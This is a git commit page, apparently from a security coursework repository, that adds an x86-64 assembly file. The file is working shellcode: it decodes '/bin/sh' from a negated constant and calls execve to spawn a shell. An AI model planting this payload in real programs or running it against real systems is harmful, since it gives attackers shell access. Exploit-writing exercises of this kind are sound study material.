Add q4 files
This commit is contained in:
parent
c3bc46cdac
commit
15695498a4
3 changed files with 57 additions and 0 deletions
|
@ -0,0 +1,18 @@
|
|||
|
||||
.text
|
||||
.globl _start
|
||||
|
||||
_start:
|
||||
xor %eax,%eax
|
||||
movabs $0xff978cd091969dd1,%rbx
|
||||
neg %rbx
|
||||
push %rbx
|
||||
push %rsp
|
||||
pop %rdi
|
||||
cltd
|
||||
push %rdx
|
||||
push %rdi
|
||||
push %rsp
|
||||
pop %rsi
|
||||
mov $0x3b,%al
|
||||
syscall
|
Loading…
Add table
Add a link
Reference in a new issue